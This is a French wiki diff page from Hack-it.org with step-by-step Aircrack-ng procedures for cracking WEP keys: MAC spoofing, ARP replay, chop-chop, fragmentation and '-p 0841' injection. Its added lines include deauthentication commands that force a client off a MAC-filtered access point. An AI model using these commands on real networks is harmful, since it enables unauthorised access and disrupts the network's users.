Aircrack-ng
De Hack-it.org.
(→Mac spoofing) |
|||
Ligne 104 : | Ligne 104 : | ||
Pour les procédures ci-dessous, dans les cas où l'association ne fonctionne pas, il faut couper la carte et changer l'adresse mac de la carte par celle d'un client connecté à la station, et relancer la carte: | Pour les procédures ci-dessous, dans les cas où l'association ne fonctionne pas, il faut couper la carte et changer l'adresse mac de la carte par celle d'un client connecté à la station, et relancer la carte: | ||
<br />>>> ifconfig $iface down | <br />>>> ifconfig $iface down | ||
- | <br />>>>macchanger --mac $ | + | <br />>>>macchanger --mac $mac_client $iface |
=== Méthode "ARP replay" === | === Méthode "ARP replay" === | ||
- | '''Méthode avec client | + | '''Méthode avec client et sans filtrage MAC''' |
* Mettre carte en monitor: | * Mettre carte en monitor: | ||
>>> ifconfig $iface down | >>> ifconfig $iface down | ||
Ligne 134 : | Ligne 134 : | ||
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés: | * Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés: | ||
>>> aircrack-ng $fichier_capture | >>> aircrack-ng $fichier_capture | ||
+ | <br />''CRACKED !!!'' | ||
=== Methode "chop-chop" et "par fragmentation" === | === Methode "chop-chop" et "par fragmentation" === | ||
Ligne 160 : | Ligne 161 : | ||
<br />-o = nombre de jeux de paquets à envoyer à la fois | <br />-o = nombre de jeux de paquets à envoyer à la fois | ||
<br />-q = intervale entre 2 paquets "keep-alive" | <br />-q = intervale entre 2 paquets "keep-alive" | ||
+ | ** En cas de filtrage MAC: | ||
+ | >>> aireplay-ng -0 1 -a $bssid_cible -c $mac_client $iface | ||
+ | <br />-0 = déauthentification | ||
+ | <br />1 = nombre de deauth à envoyer à la fois (0 -> indéfiniment) | ||
+ | <br />-c = client à déauthentifier (si pas spécifié, les deauth sont envoyés à tous les clients connectés à l'AP | ||
+ | <br />''Vérifier dans airodump-ng si le client est bien déauthentifié, sinon recommencer, et envoyer plus de deauths à la fois si besoin'' | ||
* Attaque: | * Attaque: | ||
Ligne 185 : | Ligne 192 : | ||
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés: | * Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés: | ||
>>> aircrack-ng $fichier_capture | >>> aircrack-ng $fichier_capture | ||
+ | <br />''CRACKED'' | ||
=== Méthode "-p 0841" === | === Méthode "-p 0841" === | ||
Ligne 211 : | Ligne 219 : | ||
<br />-o = nombre de jeux de paquets à envoyer à la fois | <br />-o = nombre de jeux de paquets à envoyer à la fois | ||
<br />-q = intervale entre 2 paquets "keep-alive" | <br />-q = intervale entre 2 paquets "keep-alive" | ||
+ | ** En cas de filtrage MAC: | ||
+ | >>> aireplay-ng -0 1 -a $bssid_cible -c $mac_client $iface | ||
+ | <br />-0 = déauthentification | ||
+ | <br />1 = nombre de deauth à envoyer à la fois (0 -> indéfiniment) | ||
+ | <br />-c = client à déauthentifier (si pas spécifié, les deauth sont envoyés à tous les clients connectés à l'AP | ||
+ | <br />''Vérifier dans airodump-ng si le client est bien déauthentifié, sinon recommencer, et envoyer plus de deauths à la fois si besoin'' | ||
* Lancer l'injection: | * Lancer l'injection: | ||
Ligne 220 : | Ligne 234 : | ||
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés: | * Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés: | ||
>>> aircrack-ng $fichier_capture | >>> aircrack-ng $fichier_capture | ||
+ | <br />''CRACKED'' |